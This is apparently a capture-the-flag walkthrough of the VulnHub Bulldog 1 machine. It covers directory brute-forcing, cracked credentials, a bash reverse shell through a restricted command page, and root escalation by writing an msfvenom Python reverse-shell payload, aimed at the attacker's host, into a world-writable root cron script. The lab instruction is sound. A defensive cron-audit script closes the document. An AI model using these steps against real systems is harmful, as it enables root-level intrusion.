Introduction
Series: Bulldog (2 units in this series)
Release date: August 28, 2017
Difficulty: Intermediate
Operating environment: Virtualbox
Goal: Obtain root permission
Learning:
- Directory brute-forcing
- Password cracking
- bash reverse shell
- Python file privilege escalation
- Scheduled task privilege escalation
Target machine address: https://www.vulnhub.com/entry/bulldog-1,211/
Information gathering
Host discovery
Host discovery with netdiscover
sudo netdiscover -i eth1 -r 192.168.56.0/24
Host information probing
nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106
Website probing
The homepage of the website is a static page. There is no valuable information in the page source, so go straight to directory brute-forcing.
Directory brute-forcing
dirsearch -u http://192.168.56.106/ --full-url -x 404
This turns up an admin backend address and a dev address. Visit http://192.168.56.106/dev/ and view the source code of the page to find some passwords.
Use an online site to crack them.
This gives two sets of account credentials:
nick:bulldog
sarah:bulldoglover
Command execution
Log in to the admin backend: http://192.168.56.106/admin/
Then you can access: http://192.168.56.106/dev/shell/
It seems to be a command execution vulnerability, but it limits the commands that can be used.
Looking at the commands that can be run, echo is among them, so it should be possible to implement a reverse shell with the help of bash.
Scheduled task privilege escalation
A sensitive file is found here. After searching, it turns out that this sensitive file is tied to a crontab scheduled task. The task is scheduled to run once every minute, and the command /.hiddenAVDirectory/AVApplication.py is executed by the root user.
Next, you can refer to the earlier procedure: https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d
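# Search for all files that belong to root: owner is root, user and group have execute permission, and other users have write permission
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# Recursively search from the root directory for all files whose contents mention AVApplication.py, and print the file name and matching line number
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null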
- Generate a Python reverse shell command and write it into the .py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw
Here, open the .py file in the vi editor and write in the reverse shell command generated above. The generated command is obfuscated; don't worry about it.
- Wait up to 1 minute and you will get the shell
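Seen from the defender's side, the root cause in this section is a root cron job whose script other users can modify. The following is an added example, not part of the original write-up: it audits entries in /etc/crontab format for scripts run by root that are world-writable or sit in a world-writable directory. The function names are hypothetical, and it assumes the system crontab layout (five time fields, user, command).

```python
import os
import stat

def root_cron_commands(crontab_text):
    """Yield absolute paths referenced by root entries (/etc/crontab format)."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) < 7 or fields[5] != "root":
            continue  # environment lines and non-root jobs are skipped
        for token in fields[6].split():
            if token.startswith("/"):
                yield token

def writable_by_others(path):
    """Return reasons why any local user could change what runs at path."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return []  # path does not exist or cannot be inspected
    reasons = []
    if mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    while True:
        pmode = os.stat(parent).st_mode
        # Sticky world-writable directories (e.g. /tmp) do not let other
        # users rename or delete files they do not own, so they are skipped.
        if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
            reasons.append("directory %s is world-writable" % parent)
        if parent == os.path.dirname(parent):
            break
        parent = os.path.dirname(parent)
    return reasons

def audit(crontab_text):
    """Map each risky path run by root to the list of reasons."""
    findings = {}
    for path in root_cron_commands(crontab_text):
        reasons = writable_by_others(path)
        if reasons:
            findings[path] = reasons
    return findings

if __name__ == "__main__" and os.path.exists("/etc/crontab"):
    with open("/etc/crontab") as fh:
        for path, reasons in audit(fh.read()).items():
            print(path, "->", "; ".join(reasons))
```

The fix for a finding is to make the script and its directory owned by root and not writable by group or others.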